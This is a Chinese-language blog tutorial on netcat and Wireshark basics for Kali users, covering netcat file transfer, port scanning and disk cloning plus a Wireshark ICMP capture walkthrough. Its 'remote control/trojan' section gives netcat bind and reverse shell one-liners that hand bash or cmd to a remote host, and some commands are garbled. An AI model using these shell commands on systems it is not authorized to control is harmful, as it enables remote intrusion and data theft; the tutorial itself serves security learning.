基本工具------NC,wireshark

最新推荐文章于 2024-05-17 10:27:09 发布
最新推荐文章于 2024-05-17 10:27:09 发布
阅读量193 收藏
点赞数
分类专栏: kali 工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tell_me_404/article/details/107624477
版权

基本工具

NETCAT-NC

NC 的功能

• 侦听模式/传输模式
• telnet/获取banner信息
• 传输文本信息
• 传输文件/目录
• 加密传输文件
• 远程控制/木马
• 加密所有流量
• 流媒体服务器
• 远程克隆硬盘

传输文本信息

  • A: nc -l -p 4444 -l 侦听,-p 指定端口
    B: nc -nv 1.1.1.1 4444
    可用于远程电子取证信息收集

在这里插入图片描述

传输文件

A:nc -lp 333 > 1.mp4 侦听333端口,将侦听到的内容输出到1.mp4
B:nc -nv 1.1.1.1 333 <1.mp4 -q 1 连接333端口,传入1.mp4,-q 1传递完后1s自动退出

A:nc -lp 333 <a.mp4 -q 1
B:nc -nv 1.1.1.1 333 >2.mp4

传输目录

A:tar -cvf - music/ | nc -lp 333 -q 1将目录打包成一个文件,再传输
B: nc -nv 1.1.1.1 333 | tar -xvf –接收文件,解包

加密传输文件

A:nc -lp 333 | mcrypt -flush -Fbqd -a rijndael-256 -m ecb >1.mp4
B:mcrypt –flush -Fbq -a rijndael-256 -m ecb<a.mp4 | nc -nv 1.1.1.1 333 -q l

远程控制

A:nc -lp 333 -c bash
B:nc 1.1.1. 333

A:nc -lp 333
B:1.1.1.1 333 -c bash
注:windows用户把bash改成cmd

流媒体服务器

A:cat 1.mp4 | nc -lp 333
B:1.1.1.1 333 | mplayer -vo x11 -cache 3000 -

注意:mplayer 本是没有的,需要安装

远程克隆硬盘

A:nc -lp 333 | dd of=/dev/sda
B:DD if=/dev/sda | nc -nv 1.1.1.1 333 -q 1

端口扫描

nc -nvz 1.1.1.1 1-65535-z扫描模式(默认只扫描tcp的端口)
nc -vnzu 1.1.1.1 1-1024-u(扫描udp的端口)

nc的缺陷

缺乏加密和身份验证的能力

netcat实验telnet功能:

110是接收POP3邮件的端口,客户端可以使用POP3协议来访问服务端的邮件服务,如今ISP的绝大多数邮件服务器都是使用该协议。在使用电子邮件客户端程序的时候,会要求输入POP3服务器地址,默认情况下使用的就是110端口

在这里插入图片描述
base64加密
在这里插入图片描述
在这里插入图片描述

wireshark

抓一个icmp包

1、打开wireshark

2、选择菜单栏上Capture -> Option,勾选WLAN网卡(这里需要根据各自电脑网卡使用情况选择,简单的办法可以看使用的IP对应的网卡)。点击Start。启动抓包。

在这里插入图片描述

3、wireshark启动后,wireshark处于抓包状态中。
在这里插入图片描述

4、执行需要抓包的操作,如在cmd窗口下执行ping www.baidu.com。

在这里插入图片描述
5、操作完成后相关数据包就抓取到了。为避免其他无用的数据包影响分析,可以通过在过滤栏设置过滤条件进行数据包列表过滤,获取结果如下。说明:ip.addr == 119.75.217.26 and icmp 表示只显示ICPM协议且源主机IP或者目的主机IP为119.75.217.26的数据包。说明:协议名称icmp要小写。

Wireshakr抓包界面介绍

在这里插入图片描述

说明:数据包列表区中不同的协议使用了不同的颜色区分。协议颜色标识定位在菜单栏View --> Coloring Rules。如下所示

在这里插入图片描述

WireShark 主要分为这几个界面

  1. Display Filter(显示过滤器), 用于设置过滤条件进行数据包列表过滤。菜单路径:Analyze --> Display Filters。
    在这里插入图片描述

  2. Packet List Pane(数据包列表), 显示捕获到的数据包,每个数据包包含编号,时间戳,源地址,目标地址,协议,长度,以及数据包信息。 不同协议的数据包使用了不同的颜色区分显示。

在这里插入图片描述

  1. Packet Details Pane(数据包详细信息), 在数据包列表中选择指定数据包,在数据包详细信息中会显示数据包的所有详细信息内容。数据包详细信息面板是最重要的,用来查看协议中的每一个字段。各行信息分别为
    在这里插入图片描述

(1)Frame: 物理层的数据帧概况

(2)Ethernet II: 数据链路层以太网帧头部信息

(3)Internet Protocol Version 4: 互联网层IP包头部信息

(4)Transmission Control Protocol: 传输层T的数据段头部信息,此处是TCP

(5)Hypertext Transfer Protocol: 应用层的信息,此处是HTTP协议

TCP包的具体内容

从下图可以看到wireshark捕获到的TCP包中的每个字段。

在这里插入图片描述

世俗非议不足道哉~
关注
专栏目录
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
Tcpdump抓包与Wireshark 报文分析
sanguine_boy的博客
12-08 1573
linux服务器端口数据报文分析
wireshark相关协议详解和nc命令建立对话
AndrewYZWang的博客
10-01 708
TFTP简介: tftp简单的文件传输协议,用于实现误判系统引导、小文件传输、系统镜像升级引导等 TFTP基于UDP协议设计(69)端口采用停止等待方式进行文件传输,采用超时重传机制进行重传 TFTP将传输数据时将文件数据切割成块512字节方式传输,当最后一块不是512字节,则表示传输完成。 TFTP支持ASCII码(文本,模式)和Octet(二进制模式)两种方式传输,可对文件进行读和写两种操作...
NetCat(NC)详细教程
qq_41245301的博客
11-29 748
1995年第一个版本公布,NetCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接(network connection)。它被设计成一个可靠的后端(back-end)工具,能被其它的程序程序或脚本直接地或容易地驱动。同时,它又是一个功能丰富的网络调试和开发工具,因为它可以建立你可能用到的几乎任何类型的连接,以及一些非常有意思的内建功能。NetCat,它的实际可运行的名字叫nc,应该早很就被提供,就象另一个没有公开但是标准的Unix工具
shell命令之nc所有用法+网络抓包
qq_30531921的博客
05-17 674
nc用法+总结
wireshark 抓包ARP分组
anlian523的博客
11-23 1万+
从下图的报文数据的结构来看,ARP协议属于是网络层协议,因为它被封装在了以太网帧中(从包封装的角度来讲)。但从功能上来说,ARP是为了获得获取到MAC地址,所以也可以说是属于链路层协议。 Who has 192.168.0.1? Tell 192.168.0.101。翻译过来就是,谁是192.168.0.1,请告诉我192.168.0.101。 从ARP的字段上看,7e:90:3c:47:04:0a这个设备和192.168.0.101绑定在了一起,它想知道192.168.0.1的MAC地址是什么,所以Ta
03wireshark实践——抓包对比ncncat之间不加密与加密流量的区别
Wittengenstein的博客
10-04 1896
环境 Ubuntu18.04 Kali Linux:5.2.9-2kali1 ncncat的区别 nc 不能对流量进行加密,在传输过程中都是明文传输,能够被嗅探 ncat ncat属于nmap工具ncat可以对数据包的传输进行ssl管道加密,即使被抓到包后,但由于已经对数据管道进行了加密,所以看到的信息也是加密过得,不易破解 实验演示 nc不加密的情况抓包演示 1.先查看...
kail基本工具----netcat
qq_42812036的博客
06-06 1436
Nc / ncat Wireshark Tcpdump NETCAT——NC 网络工具中的瑞士军刀 侦察模式 / 传输模式 telnet / 获取banner信息 传输文本信息 传输文件/目录 加密传输文件 远程控制 / 木马 加密所有流量 流媒体服务器 远程克隆硬盘 ping smtp.163.com PING smtp.163.com (123.126.97.4) 56(84) by...
BurpSuite工具-HTTP协议详解部分(不懂就查系列)
学习、分享、交流
05-22 1705
HTTP协议,即超文本传输协议(Hypertext transfer protocol)。是一种详细规定了浏览器和万维网(W W W = W orld W ide W eb)服务器之间互相通信的规则,通过因特网传送万维网文档的数据传送协议
sokit-1.3-win32-enu.7z
12-02
4. **与其他工具的对比**:sokit可能与Wireshark、netcat (nc) 等工具有相似的功能,但可能更加专注于TCP/UDP调试,提供更为简单易用的界面和针对性的操作体验。 5. **学习资源**:为了更好地使用sokit,用户可以...
常见工具 nc Wireshark反弹shell
代码审计
04-20 1384
常⽤⼯具 • 经常使⽤且功能强⼤ • 安全从业者必不可少的帮⼿ • Nc / ncat • Wireshark • Tcpdump nc -lvp 使用nc 监听特定的端口 nc -nv ip port 连接特定ip下的指定端口 NETCAT ——NC • ⺴络⼯具中的瑞⼠军⼑——⼩⾝材、⼤智慧 • 侦听模式 / 传输模式 • telnet / 获取banner信息 • 传输⽂本信息 • 传输⽂件/⺫录 • 加密传输⽂件 • 远程控制/⽊⻢ • 加密所有流量 • 流媒体服务器 • 远程克隆硬盘 root@
wireshark-实时抓取移动设备上的通信包(Wireshark+nc+tcpdump)
zhangmiaoping23的专栏
08-31 2039
1.iPhone协议分析 PC端 cd D:\Program Files (x86)\usbmuxd-1.0.8\python-client tcprelay.py -t 22:22 tcprelay.py -t 7100:6100 cd E:\Program Files (x86)\wireshark-1.11.3\wireshark-1.11.3\wireshark-
使用nc(netcat)测试udp协议与端口连通性
热门推荐
码上笔记
06-03 5万+
我们一般想到测试连通性时第一考虑到的就是使用ping命令。但是我们知道ping命令使用的是icmp协议,属于tcp/ip协议中的一个子协议,所以我们可以用ping命令来测试tcp的连通性还可以测试延迟情况。tcp相关协议了解可以参考:TCP/IP四层模型讲解【笔记整理通俗易懂版】但是当我们需要测试udp连接的时候ping命令显然没有任何作用。这时候我们可以用到netcat,这个命令被誉为是网络中的...
结合Wireshark捕获分组深入理解DNS协议
zhaqiwen的专栏
01-09 2万+
一、概述 1.1 DNS     识别主机有两种方式:主机名、IP地址。前者便于记忆(如www.yahoo.com),但路由器很难处理(主机名长度不定);后者定长、有层次结构,便于路由器处理,但难以记忆。折中的办法就是建立IP地址与主机名间的映射,这就是域名系统DNS做的工作。DNS通常由其他应用层协议使用(如HTTP、SMTP、FTP),将主机名解析为IP地址,其运行在UDP之上,使用53号
linux下nc命令参数及用法详解--功能超级强大的网络工具netcat
xiaopang758的专栏
07-27 1600
功能说明:功能强大的网络工具 语  法:nc [-hlnruz][-g][-G][-i][-o][-p][-s][-v...][-w][主机名称][通信端口...] 参  数:   -G   设置来源路由指向器,其数值为4的倍数。   -i   设置时间间隔,以便传送信息及扫描通信端口。   -n   直接使用IP地址,而不通过域名服务器。   -p   设置本地主机使用的通信端口。
渗透测试抓包工具-wireshark
分享学习网络的点点滴滴
04-18 5225
wireshark功能介绍1.抓包嗅探协议分析2.安全专家必备的技能3.抓包引擎Libpcap9----LinuxWinpcap10-----Windows4.解码能力   wireshark基本使用方法1.启动软件2.选择抓包网卡3.选择混杂模式4.实施抓包5.保存和分析捕获文件6.首选项(可以定制布局,列表,字体等等功能)   Wireshark筛选器过滤掉干扰的数据包抓包筛选器显示筛选器可以在上图进行一系列的过滤  wir
wireshark 固定监听端口
atzqtzq的博客
01-01 1万+
1.选择好网卡 2.开始后,监听tcp端口 在filter输入框:tcp.port == 12345 监控本地的好像不行, 当使用tcpdump或者wireshark之类的tcp层工具抓包,获取是加密的内容,而如果用应用层抓包,使用Charels(Mac)、Fildder(Windows)抓包工具,那当然看到是明文的。 ...
(3)Kali渗透测试之基本工具-ncwireshark、tcpdump、过程文档记录工具
习惯积淀的博客
06-14 524
基本工具的介绍 netcat -nc 网络工具中的瑞士军刀 侦听模式/传输模式 传输文本 nc -vn ip port 客户端连接一个服务器 nc -l -p port 服务端监听本地端口 传输文件、目录 nc -lp 33 3 > 1.mp4 nc -nv 1.1.1.1 333 < 1.mp4 -q 1 或者 nc -q 1 -lp 333 < a.m...
wireshark ----
最新发布
05-22
Wireshark是一个网络封包分析软件。它可以帮助你捕获并分析网络上的数据流,以便进行故障排除、安全审计等工作。Wireshark支持多种网络协议,包括TCP、UDP、HTTP、DNS等等,可以在各种不同的操作系统上运行,包括...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值